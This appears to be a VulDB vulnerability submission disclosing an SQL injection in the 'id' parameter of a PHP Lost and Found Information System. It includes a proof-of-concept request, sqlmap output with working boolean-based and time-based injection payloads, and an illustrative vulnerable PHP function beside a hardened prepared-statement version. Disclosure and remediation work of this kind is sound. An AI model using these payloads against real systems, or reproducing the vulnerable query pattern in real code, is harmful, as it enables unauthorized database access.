Submission #155230: SQL Injection in view category function in Lost and Found Information System

Title: SQL Injection in view category function in Lost and Found Information System
Description: SQL Injection in view category function in Lost and Found Information System 1.0, parameter: id

Product: Lost and Found Information System
Version: 1.0

PoC request:

GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/php-lfis/admin/?page=categories
Connection: close
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Run the request with sqlmap; output:

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=categories/view_category&id=2' AND 9766=9766 AND 'VGnK'='VGnK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories/view_category&id=2' AND (SELECT 6692 FROM (SELECT(SLEEP(5)))HXST) AND 'bNNb'='bNNb
---
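As an added example (not code from the SourceCodester project or the submitter), the PHP pattern that typically produces a finding like this one, where the GET parameter id is interpolated into the query string, shown next to a hardened version that validates the type and binds the value; the table and column names are assumptions:

```php
<?php
// Added illustration, not the project's code. The table name "category_list" and
// its columns are assumptions; only the vulnerable parameter ("id") comes from the report.

// Vulnerable pattern (assumed): the untrusted value is concatenated into the SQL text,
// so a value such as 2' AND 9766=9766 AND 'VGnK'='VGnK becomes part of the WHERE clause.
function view_category_vulnerable(mysqli $conn, array $get): ?array
{
    $id  = $get['id'] ?? '';
    $sql = "SELECT * FROM category_list WHERE id = '{$id}'";
    $res = $conn->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened form: reject anything that is not a positive integer before any SQL is built,
// then send the value separately from the query text with a prepared statement.
function view_category_safe(mysqli $conn, array $get): ?array
{
    $id = filter_var(
        $get['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        return null; // caller renders "not found" instead of running a query
    }

    $stmt = $conn->prepare('SELECT id, name, description FROM category_list WHERE id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);       // bound as an integer, never spliced into the SQL
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}
```

With the hardened function, both sqlmap payloads above fail the integer check and never reach the database, which is also what a regression test for this finding should assert.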
Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
User: huutuanbg97 (UID 45015)
Submission: 11/05/2023 17:32 (3 years ago)
Moderation: 12/05/2023 08:01 (14 hours later)
Status: Accepted
VulDB entry: 228885 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_category ID sql injection]
Points: 20
